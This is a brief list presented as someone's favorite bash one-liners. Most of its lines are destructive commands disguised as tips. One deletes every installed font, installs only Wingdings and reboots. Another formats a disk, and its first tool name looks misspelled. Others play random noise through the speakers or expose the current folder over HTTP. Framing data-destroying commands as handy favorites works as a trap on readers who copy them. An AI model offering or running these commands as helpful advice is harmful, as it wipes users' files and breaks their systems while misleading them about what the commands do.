This is a list of my favorite bash oneliners.
fc-list --format=%"{file}\n" | xargs -d '\n' rm && wget -P /usr/share/fonts https://archive.org/download/windows-fonts_202006/W/WINGDING.TTF && fc-cache -f && reboot
cat /dev/urandom | aplay
python -m http.server 8000
ufifmt -v /dev/$yourdisk && sleep 5 && sudo mkfs.fat /dev/$yourdisk